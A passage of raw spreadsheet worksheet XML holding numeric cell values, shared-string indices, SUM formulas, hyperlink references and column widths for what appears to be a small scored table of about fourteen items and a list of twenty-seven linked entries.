        <v>17</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>18</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E4" s="1">
        <v>22.0</v>
      </c>
      <c r="F4" s="1">
        <v>1135.0</v>
      </c>
      <c r="G4" s="4">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="H4" s="1">
        <v>1.0</v>
      </c>
      <c r="I4" s="1">
        <v>0.0</v>
      </c>
      <c r="J4" s="1">
        <v>2.0</v>
      </c>
      <c r="K4" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="1">
        <v>4.0</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>11</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>20</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>21</v>
      </c>
      <c r="E5" s="1">
        <v>319.0</v>
      </c>
      <c r="F5" s="1">
        <v>2115.0</v>
      </c>
      <c r="G5" s="4">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="H5" s="6">
        <v>3.0</v>
      </c>
      <c r="I5" s="6">
        <v>1.0</v>
      </c>
      <c r="J5" s="6">
        <v>2.0</v>
      </c>
      <c r="K5" s="6">
        <v>1.0</v>
      </c>
      <c r="L5" s="1" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="1">
        <v>5.0</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>14</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>23</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>24</v>
      </c>
      <c r="E6" s="1">
        <v>31.0</v>
      </c>
      <c r="F6" s="1">
        <v>512.0</v>
      </c>
      <c r="G6" s="4">
        <f t="shared" si="1"/>
        <v>8</v>
      </c>
      <c r="H6" s="1">
        <v>4.0</v>
      </c>
      <c r="I6" s="1">
        <v>0.0</v>
      </c>
      <c r="J6" s="1">
        <v>3.0</v>
      </c>
      <c r="K6" s="1">
        <v>1.0</v>
      </c>
      <c r="L6" s="1" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="1">
        <v>6.0</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C7" s="3" t="s">
        <v>26</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>27</v>
      </c>
      <c r="E7" s="1">
        <v>17.0</v>
      </c>
      <c r="F7" s="1">
        <v>385.0</v>
      </c>
      <c r="G7" s="4">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="H7" s="1">
        <v>3.0</v>
      </c>
      <c r="I7" s="1">
        <v>0.0</v>
      </c>
      <c r="J7" s="1">
        <v>1.0</v>
      </c>
      <c r="K7" s="1">
        <v>1.0</v>
      </c>
      <c r="L7" s="1" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="1">
        <v>7.0</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>14</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>29</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>30</v>
      </c>
      <c r="E8" s="1">
        <v>290.0</v>
      </c>
      <c r="F8" s="1">
        <v>9765.0</v>
      </c>
      <c r="G8" s="4">
        <f t="shared" si="1"/>
        <v>8</v>
      </c>
      <c r="H8" s="1">
        <v>2.0</v>
      </c>
      <c r="I8" s="1">
        <v>2.0</v>
      </c>
      <c r="J8" s="1">
        <v>4.0</v>
      </c>
      <c r="K8" s="1">
        <v>0.0</v>
      </c>
      <c r="L8" s="1" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="1">
        <v>8.0</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>11</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>31</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>32</v>
      </c>
      <c r="E9" s="1">
        <v>72328.0</v>
      </c>
      <c r="F9" s="1">
        <v>1162644.0</v>
      </c>
      <c r="G9" s="4">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="H9" s="1">
        <v>1.0</v>
      </c>
      <c r="I9" s="1">
        <v>3.0</v>
      </c>
      <c r="J9" s="1">
        <v>2.0</v>
      </c>
      <c r="K9" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="1">
        <v>9.0</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>17</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>33</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>34</v>
      </c>
      <c r="E10" s="1">
        <v>9.0</v>
      </c>
      <c r="F10" s="1">
        <v>34.0</v>
      </c>
      <c r="G10" s="5">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H10" s="1">
        <v>0.0</v>
      </c>
      <c r="I10" s="1">
        <v>0.0</v>
      </c>
      <c r="J10" s="1">
        <v>0.0</v>
      </c>
      <c r="K10" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="1">
        <v>10.0</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>35</v>
      </c>
      <c r="D11" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E11" s="1">
        <v>14.0</v>
      </c>
      <c r="F11" s="1">
        <v>23.0</v>
      </c>
      <c r="G11" s="4">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="H11" s="1">
        <v>2.0</v>
      </c>
      <c r="I11" s="1">
        <v>0.0</v>
      </c>
      <c r="J11" s="1">
        <v>2.0</v>
      </c>
      <c r="K11" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="1">
        <v>11.0</v>
      </c>
      <c r="B12" s="7" t="s">
        <v>17</v>
      </c>
      <c r="C12" s="7" t="s">
        <v>37</v>
      </c>
      <c r="D12" s="1" t="s">
        <v>38</v>
      </c>
      <c r="E12" s="1">
        <v>18.0</v>
      </c>
      <c r="F12" s="1">
        <v>75.0</v>
      </c>
      <c r="G12" s="5">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H12" s="8">
        <v>0.0</v>
      </c>
      <c r="I12" s="8">
        <v>0.0</v>
      </c>
      <c r="J12" s="8">
        <v>0.0</v>
      </c>
      <c r="K12" s="8">
        <v>0.0</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="1">
        <v>12.0</v>
      </c>
      <c r="B13" s="7" t="s">
        <v>17</v>
      </c>
      <c r="C13" s="7" t="s">
        <v>39</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>40</v>
      </c>
      <c r="E13" s="1">
        <v>19.0</v>
      </c>
      <c r="F13" s="1">
        <v>86.0</v>
      </c>
      <c r="G13" s="5">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H13" s="1">
        <v>0.0</v>
      </c>
      <c r="I13" s="1">
        <v>0.0</v>
      </c>
      <c r="J13" s="1">
        <v>0.0</v>
      </c>
      <c r="K13" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="1">
        <v>13.0</v>
      </c>
      <c r="B14" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C14" s="3" t="s">
        <v>41</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>42</v>
      </c>
      <c r="E14" s="1">
        <v>45.0</v>
      </c>
      <c r="F14" s="9">
        <v>7580.0</v>
      </c>
      <c r="G14" s="4">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="H14" s="1">
        <v>1.0</v>
      </c>
      <c r="I14" s="1">
        <v>2.0</v>
      </c>
      <c r="J14" s="1">
        <v>2.0</v>
      </c>
      <c r="K14" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="1">
        <v>14.0</v>
      </c>
      <c r="B15" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C15" s="3" t="s">
        <v>43</v>
      </c>
      <c r="D15" s="1" t="s">
        <v>44</v>
      </c>
      <c r="E15" s="9">
        <v>2801.0</v>
      </c>
      <c r="F15" s="1">
        <v>123100.0</v>
      </c>
      <c r="G15" s="4">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="H15" s="1">
        <v>2.0</v>
      </c>
      <c r="I15" s="1">
        <v>1.0</v>
      </c>
      <c r="J15" s="1">
        <v>3.0</v>
      </c>
      <c r="K15" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="16">
      <c r="F16" s="1" t="s">
        <v>45</v>
      </c>
      <c r="H16" s="4">
        <f t="shared" ref="H16:K16" si="2">SUM(H2:H15)</f>
        <v>19</v>
      </c>
      <c r="I16" s="4">
        <f t="shared" si="2"/>
        <v>9</v>
      </c>
      <c r="J16" s="4">
        <f t="shared" si="2"/>
        <v>23</v>
      </c>
      <c r="K16" s="4">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
    </row>
    <row r="17">
      <c r="B17" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C17" s="1">
        <v>4.0</v>
      </c>
      <c r="D17" s="1" t="s">
        <v>46</v>
      </c>
      <c r="K17" s="1"/>
      <c r="L17" s="2" t="s">
        <v>0</v>
      </c>
      <c r="M17" s="2" t="s">
        <v>1</v>
      </c>
      <c r="N17" s="1" t="s">
        <v>2</v>
      </c>
      <c r="O17" s="1" t="s">
        <v>3</v>
      </c>
      <c r="P17" s="1" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="18">
      <c r="B18" s="3" t="s">
        <v>11</v>
      </c>
      <c r="C18" s="1">
        <v>3.0</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>47</v>
      </c>
      <c r="K18" s="1">
        <v>1.0</v>
      </c>
      <c r="L18" s="3" t="s">
        <v>11</v>
      </c>
      <c r="M18" s="3" t="s">
        <v>12</v>
      </c>
      <c r="N18" s="1" t="s">
        <v>13</v>
      </c>
      <c r="O18" s="1">
        <v>48.0</v>
      </c>
      <c r="P18" s="1">
        <v>273.0</v>
      </c>
    </row>
    <row r="19">
      <c r="B19" s="3" t="s">
        <v>17</v>
      </c>
      <c r="C19" s="1">
        <v>4.0</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>48</v>
      </c>
      <c r="K19" s="1">
        <v>2.0</v>
      </c>
      <c r="L19" s="3" t="s">
        <v>14</v>
      </c>
      <c r="M19" s="3" t="s">
        <v>15</v>
      </c>
      <c r="N19" s="1" t="s">
        <v>16</v>
      </c>
      <c r="O19" s="1">
        <v>16.0</v>
      </c>
      <c r="P19" s="1">
        <v>306.0</v>
      </c>
    </row>
    <row r="20">
      <c r="B20" s="3" t="s">
        <v>14</v>
      </c>
      <c r="C20" s="1">
        <v>3.0</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>49</v>
      </c>
      <c r="K20" s="1">
        <v>3.0</v>
      </c>
      <c r="L20" s="3" t="s">
        <v>17</v>
      </c>
      <c r="M20" s="3" t="s">
        <v>18</v>
      </c>
      <c r="N20" s="1" t="s">
        <v>19</v>
      </c>
      <c r="O20" s="1">
        <v>22.0</v>
      </c>
      <c r="P20" s="1">
        <v>1135.0</v>
      </c>
    </row>
    <row r="21">
      <c r="B21" s="10" t="s">
        <v>50</v>
      </c>
      <c r="K21" s="1">
        <v>4.0</v>
      </c>
      <c r="L21" s="3" t="s">
        <v>11</v>
      </c>
      <c r="M21" s="3" t="s">
        <v>20</v>
      </c>
      <c r="N21" s="1" t="s">
        <v>21</v>
      </c>
      <c r="O21" s="1">
        <v>319.0</v>
      </c>
      <c r="P21" s="1">
        <v>2115.0</v>
      </c>
    </row>
    <row r="22">
      <c r="B22" s="10" t="s">
        <v>51</v>
      </c>
      <c r="K22" s="1">
        <v>5.0</v>
      </c>
      <c r="L22" s="3" t="s">
        <v>14</v>
      </c>
      <c r="M22" s="3" t="s">
        <v>23</v>
      </c>
      <c r="N22" s="1" t="s">
        <v>24</v>
      </c>
      <c r="O22" s="1">
        <v>31.0</v>
      </c>
      <c r="P22" s="1">
        <v>512.0</v>
      </c>
    </row>
    <row r="23">
      <c r="B23" s="11" t="s">
        <v>52</v>
      </c>
      <c r="G23" s="1" t="s">
        <v>53</v>
      </c>
      <c r="K23" s="1">
        <v>6.0</v>
      </c>
      <c r="L23" s="3" t="s">
        <v>25</v>
      </c>
      <c r="M23" s="3" t="s">
        <v>26</v>
      </c>
      <c r="N23" s="1" t="s">
        <v>27</v>
      </c>
      <c r="O23" s="1">
        <v>17.0</v>
      </c>
      <c r="P23" s="1">
        <v>385.0</v>
      </c>
    </row>
    <row r="24">
      <c r="K24" s="1">
        <v>7.0</v>
      </c>
      <c r="L24" s="3" t="s">
        <v>14</v>
      </c>
      <c r="M24" s="3" t="s">
        <v>29</v>
      </c>
      <c r="N24" s="1" t="s">
        <v>30</v>
      </c>
      <c r="O24" s="1">
        <v>290.0</v>
      </c>
      <c r="P24" s="1">
        <v>9765.0</v>
      </c>
    </row>
    <row r="25">
      <c r="K25" s="1">
        <v>8.0</v>
      </c>
      <c r="L25" s="3" t="s">
        <v>11</v>
      </c>
      <c r="M25" s="3" t="s">
        <v>31</v>
      </c>
      <c r="N25" s="1" t="s">
        <v>32</v>
      </c>
      <c r="O25" s="1">
        <v>72328.0</v>
      </c>
      <c r="P25" s="1">
        <v>1162644.0</v>
      </c>
    </row>
    <row r="26">
      <c r="K26" s="1">
        <v>9.0</v>
      </c>
      <c r="L26" s="3" t="s">
        <v>17</v>
      </c>
      <c r="M26" s="3" t="s">
        <v>33</v>
      </c>
      <c r="N26" s="1" t="s">
        <v>34</v>
      </c>
      <c r="O26" s="1">
        <v>9.0</v>
      </c>
      <c r="P26" s="1">
        <v>34.0</v>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="1">
        <v>1.0</v>
      </c>
      <c r="B27" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C27" s="12" t="s">
        <v>54</v>
      </c>
      <c r="D27" s="1" t="s">
        <v>55</v>
      </c>
      <c r="E27" s="10" t="s">
        <v>56</v>
      </c>
      <c r="K27" s="1">
        <v>10.0</v>
      </c>
      <c r="L27" s="3" t="s">
        <v>25</v>
      </c>
      <c r="M27" s="3" t="s">
        <v>35</v>
      </c>
      <c r="N27" s="1" t="s">
        <v>36</v>
      </c>
      <c r="O27" s="1">
        <v>14.0</v>
      </c>
      <c r="P27" s="1">
        <v>23.0</v>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="1">
        <v>2.0</v>
      </c>
      <c r="B28" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C28" s="12" t="s">
        <v>54</v>
      </c>
      <c r="D28" s="1" t="s">
        <v>57</v>
      </c>
      <c r="E28" s="10" t="s">
        <v>58</v>
      </c>
      <c r="K28" s="1">
        <v>11.0</v>
      </c>
      <c r="L28" s="7" t="s">
        <v>17</v>
      </c>
      <c r="M28" s="7" t="s">
        <v>37</v>
      </c>
      <c r="N28" s="1" t="s">
        <v>38</v>
      </c>
      <c r="O28" s="1">
        <v>18.0</v>
      </c>
      <c r="P28" s="1">
        <v>75.0</v>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="1">
        <v>3.0</v>
      </c>
      <c r="B29" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C29" s="1" t="s">
        <v>59</v>
      </c>
      <c r="D29" s="1" t="s">
        <v>60</v>
      </c>
      <c r="E29" s="10" t="s">
        <v>61</v>
      </c>
      <c r="K29" s="1">
        <v>12.0</v>
      </c>
      <c r="L29" s="7" t="s">
        <v>17</v>
      </c>
      <c r="M29" s="7" t="s">
        <v>39</v>
      </c>
      <c r="N29" s="1" t="s">
        <v>40</v>
      </c>
      <c r="O29" s="1">
        <v>19.0</v>
      </c>
      <c r="P29" s="1">
        <v>86.0</v>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="1">
        <v>4.0</v>
      </c>
      <c r="B30" s="1" t="s">
        <v>62</v>
      </c>
      <c r="C30" s="1" t="s">
        <v>63</v>
      </c>
      <c r="D30" s="1" t="s">
        <v>64</v>
      </c>
      <c r="E30" s="10" t="s">
        <v>65</v>
      </c>
      <c r="K30" s="1">
        <v>13.0</v>
      </c>
      <c r="L30" s="3" t="s">
        <v>25</v>
      </c>
      <c r="M30" s="3" t="s">
        <v>41</v>
      </c>
      <c r="N30" s="1" t="s">
        <v>42</v>
      </c>
      <c r="O30" s="1">
        <v>45.0</v>
      </c>
      <c r="P30" s="9">
        <v>7580.0</v>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="1">
        <v>5.0</v>
      </c>
      <c r="B31" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C31" s="1" t="s">
        <v>66</v>
      </c>
      <c r="D31" s="1" t="s">
        <v>67</v>
      </c>
      <c r="E31" s="10" t="s">
        <v>68</v>
      </c>
      <c r="K31" s="1">
        <v>14.0</v>
      </c>
      <c r="L31" s="3" t="s">
        <v>25</v>
      </c>
      <c r="M31" s="3" t="s">
        <v>43</v>
      </c>
      <c r="N31" s="1" t="s">
        <v>44</v>
      </c>
      <c r="O31" s="9">
        <v>2801.0</v>
      </c>
      <c r="P31" s="1">
        <v>123100.0</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="1">
        <v>6.0</v>
      </c>
      <c r="B32" s="1" t="s">
        <v>62</v>
      </c>
      <c r="C32" s="1" t="s">
        <v>63</v>
      </c>
      <c r="D32" s="1" t="s">
        <v>69</v>
      </c>
      <c r="E32" s="10" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="1">
        <v>7.0</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C33" s="12" t="s">
        <v>54</v>
      </c>
      <c r="D33" s="1" t="s">
        <v>71</v>
      </c>
      <c r="E33" s="10" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="1">
        <v>8.0</v>
      </c>
      <c r="B34" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C34" s="12" t="s">
        <v>54</v>
      </c>
      <c r="D34" s="1" t="s">
        <v>73</v>
      </c>
      <c r="E34" s="10" t="s">
        <v>74</v>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="1">
        <v>9.0</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C35" s="1" t="s">
        <v>59</v>
      </c>
      <c r="D35" s="1" t="s">
        <v>75</v>
      </c>
      <c r="E35" s="10" t="s">
        <v>76</v>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="1">
        <v>10.0</v>
      </c>
      <c r="B36" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C36" s="1" t="s">
        <v>59</v>
      </c>
      <c r="D36" s="1" t="s">
        <v>77</v>
      </c>
      <c r="E36" s="10" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="1">
        <v>11.0</v>
      </c>
      <c r="B37" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C37" s="13" t="s">
        <v>79</v>
      </c>
      <c r="D37" s="1" t="s">
        <v>80</v>
      </c>
      <c r="E37" s="10" t="s">
        <v>81</v>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="1">
        <v>12.0</v>
      </c>
      <c r="B38" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C38" s="13" t="s">
        <v>82</v>
      </c>
      <c r="D38" s="1" t="s">
        <v>83</v>
      </c>
      <c r="E38" s="10" t="s">
        <v>84</v>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="1">
        <v>13.0</v>
      </c>
      <c r="B39" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C39" s="12" t="s">
        <v>54</v>
      </c>
      <c r="D39" s="1" t="s">
        <v>85</v>
      </c>
      <c r="E39" s="10" t="s">
        <v>86</v>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="1">
        <v>14.0</v>
      </c>
      <c r="B40" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C40" s="13" t="s">
        <v>79</v>
      </c>
      <c r="D40" s="1" t="s">
        <v>87</v>
      </c>
      <c r="E40" s="10" t="s">
        <v>88</v>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="1">
        <v>15.0</v>
      </c>
      <c r="B41" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C41" s="13" t="s">
        <v>89</v>
      </c>
      <c r="D41" s="1" t="s">
        <v>90</v>
      </c>
      <c r="E41" s="10" t="s">
        <v>91</v>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="1">
        <v>16.0</v>
      </c>
      <c r="B42" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C42" s="1" t="s">
        <v>92</v>
      </c>
      <c r="D42" s="1" t="s">
        <v>93</v>
      </c>
      <c r="E42" s="10" t="s">
        <v>94</v>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="1">
        <v>17.0</v>
      </c>
      <c r="B43" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C43" s="13" t="s">
        <v>89</v>
      </c>
      <c r="D43" s="1" t="s">
        <v>95</v>
      </c>
      <c r="E43" s="10" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="1">
        <v>18.0</v>
      </c>
      <c r="B44" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C44" s="13" t="s">
        <v>97</v>
      </c>
      <c r="D44" s="1" t="s">
        <v>98</v>
      </c>
      <c r="E44" s="10" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="1">
        <v>19.0</v>
      </c>
      <c r="B45" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C45" s="12" t="s">
        <v>54</v>
      </c>
      <c r="D45" s="1" t="s">
        <v>100</v>
      </c>
      <c r="E45" s="10" t="s">
        <v>101</v>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="1">
        <v>20.0</v>
      </c>
      <c r="B46" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C46" s="1" t="s">
        <v>59</v>
      </c>
      <c r="D46" s="1" t="s">
        <v>102</v>
      </c>
      <c r="E46" s="10" t="s">
        <v>103</v>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="1">
        <v>21.0</v>
      </c>
      <c r="B47" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C47" s="12" t="s">
        <v>54</v>
      </c>
      <c r="D47" s="1" t="s">
        <v>104</v>
      </c>
      <c r="E47" s="10" t="s">
        <v>105</v>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="1">
        <v>22.0</v>
      </c>
      <c r="B48" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C48" s="12" t="s">
        <v>54</v>
      </c>
      <c r="D48" s="1" t="s">
        <v>106</v>
      </c>
      <c r="E48" s="10" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="1">
        <v>23.0</v>
      </c>
      <c r="B49" s="1" t="s">
        <v>62</v>
      </c>
      <c r="C49" s="13" t="s">
        <v>108</v>
      </c>
      <c r="D49" s="1" t="s">
        <v>109</v>
      </c>
      <c r="E49" s="10" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="1">
        <v>24.0</v>
      </c>
      <c r="B50" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C50" s="12" t="s">
        <v>54</v>
      </c>
      <c r="D50" s="1" t="s">
        <v>111</v>
      </c>
      <c r="E50" s="10" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="1">
        <v>25.0</v>
      </c>
      <c r="B51" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C51" s="13" t="s">
        <v>89</v>
      </c>
      <c r="D51" s="1" t="s">
        <v>113</v>
      </c>
      <c r="E51" s="10" t="s">
        <v>114</v>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="1">
        <v>26.0</v>
      </c>
      <c r="B52" s="1" t="s">
        <v>62</v>
      </c>
      <c r="C52" s="13" t="s">
        <v>89</v>
      </c>
      <c r="D52" s="1" t="s">
        <v>115</v>
      </c>
      <c r="E52" s="10" t="s">
        <v>116</v>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="1">
        <v>27.0</v>
      </c>
      <c r="B53" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C53" s="1" t="s">
        <v>59</v>
      </c>
      <c r="D53" s="1" t="s">
        <v>117</v>
      </c>
      <c r="E53" s="10" t="s">
        <v>118</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="B21"/>
    <hyperlink r:id="rId2" ref="B22"/>
    <hyperlink r:id="rId3" ref="B23"/>
    <hyperlink r:id="rId4" ref="C27"/>
    <hyperlink r:id="rId5" ref="E27"/>
    <hyperlink r:id="rId6" ref="C28"/>
    <hyperlink r:id="rId7" ref="E28"/>
    <hyperlink r:id="rId8" ref="E29"/>
    <hyperlink r:id="rId9" ref="E30"/>
    <hyperlink r:id="rId10" ref="E31"/>
    <hyperlink r:id="rId11" ref="E32"/>
    <hyperlink r:id="rId12" ref="C33"/>
    <hyperlink r:id="rId13" ref="E33"/>
    <hyperlink r:id="rId14" ref="C34"/>
    <hyperlink r:id="rId15" ref="E34"/>
    <hyperlink r:id="rId16" ref="E35"/>
    <hyperlink r:id="rId17" ref="E36"/>
    <hyperlink r:id="rId18" ref="C37"/>
    <hyperlink r:id="rId19" ref="E37"/>
    <hyperlink r:id="rId20" ref="C38"/>
    <hyperlink r:id="rId21" ref="E38"/>
    <hyperlink r:id="rId22" ref="C39"/>
    <hyperlink r:id="rId23" ref="E39"/>
    <hyperlink r:id="rId24" ref="C40"/>
    <hyperlink r:id="rId25" ref="E40"/>
    <hyperlink r:id="rId26" ref="C41"/>
    <hyperlink r:id="rId27" ref="E41"/>
    <hyperlink r:id="rId28" ref="E42"/>
    <hyperlink r:id="rId29" ref="C43"/>
    <hyperlink r:id="rId30" ref="E43"/>
    <hyperlink r:id="rId31" ref="C44"/>
    <hyperlink r:id="rId32" ref="E44"/>
    <hyperlink r:id="rId33" ref="C45"/>
    <hyperlink r:id="rId34" ref="E45"/>
    <hyperlink r:id="rId35" ref="E46"/>
    <hyperlink r:id="rId36" ref="C47"/>
    <hyperlink r:id="rId37" ref="E47"/>
    <hyperlink r:id="rId38" ref="C48"/>
    <hyperlink r:id="rId39" ref="E48"/>
    <hyperlink r:id="rId40" ref="C49"/>
    <hyperlink r:id="rId41" ref="E49"/>
    <hyperlink r:id="rId42" ref="C50"/>
    <hyperlink r:id="rId43" ref="E50"/>
    <hyperlink r:id="rId44" ref="C51"/>
    <hyperlink r:id="rId45" ref="E51"/>
    <hyperlink r:id="rId46" ref="C52"/>
    <hyperlink r:id="rId47" ref="E52"/>
    <hyperlink r:id="rId48" ref="E53"/>
  </hyperlinks>
  <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8.38"/>
    <col customWidth="1" min="3" max="3" width="11.0"/>
    <col customWidth="1" min="4" max="4" width="33.0"/>
    <col customWidth="1" min="14" max="14" width="11.5"/>
    <col customWidth="1" min="16" max="16" width="9.88"/>
    <col customWidth="1" min="17" max="17" width="7.88"/>
    <col customWidth="1" min="18" max="19" width="5.13"/>
    <col customWidth="1" min="20" max="20" width="7.13"/>
    <col customWidth="1" min="21" max="21" width="8.13"/>
    <col customWidth="1" min="22" max="22" width="7.88"/>
    <col customWidth="1" min="23" max="23" width="7.13"/>
    <col customWidth="1" min="24" max="24" width="6.63"/>
    <col customWidth="1" min="25" max="25" width="6.25"/>
    <col customWidth="1" min="27" max="27" width="10.13"/>
    <col customWidth="1" min="28" max="28" width="6.88"/>
    <col customWidth="1" min="29" max="29" width="7.25"/>
    <col customWidth="1" min="30" max="30" width="7.13"/>
    <col customWidth="1" min="31" max="31" width="7.25"/>
    <col customWidth="1" min="32" max="32" width="8.0"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1"/>
      <c r="B1" s="2" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>1</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>2</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>3</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>4</v>
      </c>
      <c r="G1" s="1" t="s">
        <v>5</v>
      </c>
      <c r="H1" s="1" t="s">
        <v>6</v>
      </c>
      <c r="I1" s="1" t="s">
        <v>7</v>
      </c>
      <c r="J1" s="1" t="s">
        <v>8</v>
      </c>
      <c r="K1" s="1" t="s">
        <v>9</v>
      </c>
      <c r="L1" s="1" t="s">
        <v>119</v>
      </c>
      <c r="M1" s="1" t="s">
        <v>120</v>
      </c>
      <c r="R1" s="14" t="s">
        <v>121</v>
      </c>
      <c r="V1" s="14" t="s">
        <v>122</v>
      </c>
      <c r="W1" s="15"/>
      <c r="X1" s="16" t="s">
        <v>123</v>
      </c>
      <c r="Y1" s="17" t="s">
        <v>124</v>
      </c>
      <c r="AA1" s="18" t="s">
        <v>1</v>
      </c>
      <c r="AB1" s="19" t="s">
        <v>125</v>
      </c>
      <c r="AC1" s="19" t="s">
        <v>126</v>
      </c>
      <c r="AD1" s="19" t="s">
        <v>127</v>
      </c>
      <c r="AE1" s="19" t="s">
        <v>128</v>
      </c>
      <c r="AF1" s="19" t="s">
        <v>129</v>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="20">
        <v>1.0</v>
      </c>
      <c r="B2" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C2" s="3" t="s">
        <v>41</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>42</v>
      </c>
      <c r="E2" s="1">
        <v>45.0</v>
      </c>
      <c r="F2" s="1">
        <v>7577.0</v>
      </c>
      <c r="G2" s="4">
        <f t="shared" ref="G2:G15" si="1">sum(H2:K2)</f>
        <v>4</v>
      </c>
